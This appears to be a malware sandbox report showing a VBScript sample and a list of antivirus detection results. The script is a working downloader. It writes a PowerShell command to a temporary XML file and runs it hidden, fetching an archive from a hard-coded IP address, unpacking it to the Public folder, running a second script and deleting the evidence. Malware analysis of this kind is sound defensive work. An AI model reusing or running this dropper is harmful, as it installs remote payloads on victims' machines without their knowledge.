Static | ZeroBOX
No static analysis available.
Set objShell = WScript.CreateObject("WScript.Shell")
strXML = "<command>" & _
" <a>" & _
" <execute>Start-BitsTransfer -Source ""http://185.81.157.105:555/T.jpg"" -Destination ""C:\Users\Public\ben.zip""; Expand-Archive -Path ""C:\Users\Public\ben.zip"" -DestinationPath ""C:\Users\Public\"" -Force; Start ""C:\Users\Public\zilla.vbs""; Remove-Item -Path ""C:\Users\Public\ben.zip"" -Force</execute>" & _
" </a>" & _
"</command>"
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.CreateTextFile("C:\Users\Public\temp.xml", True)
objFile.Write strXML
objFile.Close
objShell.Run "powershell -command ""[xml]$xmldoc = Get-Content 'C:\Users\Public\temp.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command""", 0, True
objFSO.DeleteFile "C:\Users\Public\temp.xml"
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
FireEye Clean
CAT-QuickHeal Clean
Skyhigh Clean
McAfee Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Arcabit Clean
Baidu Clean
VirIT Clean
Symantec ISB.Downloader!gen48
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.Script.Agent.gen
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Rising Clean
Emsisoft Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
CMC Clean
Sophos Clean
Jiangmin Clean
Google Clean
Avira Clean
MAX Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Microsoft Trojan:HTML/Casdet!rfn
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Script.Agent.gen
GData Clean
Varist Clean
AhnLab-V3 Clean
Acronis Clean
BitDefenderTheta Clean
ALYac Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [Trj]
Panda Clean
No IRMA results available.